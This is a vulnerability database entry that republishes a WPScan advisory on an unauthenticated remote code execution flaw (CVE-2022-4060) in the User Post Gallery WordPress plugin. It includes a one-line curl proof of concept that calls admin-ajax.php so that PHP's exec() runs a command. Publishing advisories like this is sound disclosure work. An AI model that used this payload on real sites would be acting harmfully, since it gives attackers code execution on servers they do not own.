Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbCydaveWPVDB-ID:8F982EBD-6FC5-452D-8280-42E027D01B1E
HistoryDec 23, 2022 - 12:00 a.m.

User Post Gallery <= 2.19 - Unauthenticated RCE

2022-12-2300:00:00
cydave
wpscan.com
23
remote code execution
unauthenticated access
user post gallery plugin
security vulnerability
php exec function

EPSS

0.385

Percentile

97.3%

JSON

The plugin does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it.

PoC

Invoke the following curl command to execute the “id” command via PHP’s exec() function: curl -i ‘http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=upg_datatable&amp;field;=field:exec:id:NULL:NULL

Related

cve 2
cvelist 1
prion 2
nvd 2
wpexploit 1
nuclei 1
githubexploit 1
cve
cve
CVE-2022-4060
2023-01-16 16:15:11
CVE-2023-0039
2023-01-03 15:15:10
cvelist
cvelist
CVE-2022-4060 User Post Gallery <= 2.19 - Unauthenticated RCE
2023-01-16 15:38:05
prion
prion
Code injection
2023-01-16 16:15:00
Open redirect
2023-01-03 15:15:00
nvd
nvd
CVE-2022-4060
2023-01-16 16:15:11
CVE-2023-0039
2023-01-03 15:15:10
wpexploit
wpexploit
User Post Gallery <= 2.19 - Unauthenticated RCE
2022-12-23 00:00:00
nuclei
nuclei
WordPress User Post Gallery <=2.19 - Remote Code Execution
2023-03-05 13:42:10
githubexploit
githubexploit
Exploit for CVE-2022-4060
2023-09-15 21:38:47

EPSS

0.385

Percentile

97.3%

JSON
Related for WPVDB-ID:8F982EBD-6FC5-452D-8280-42E027D01B1E
cve2cvelist1prion2nvd2wpexploit1nuclei1githubexploit1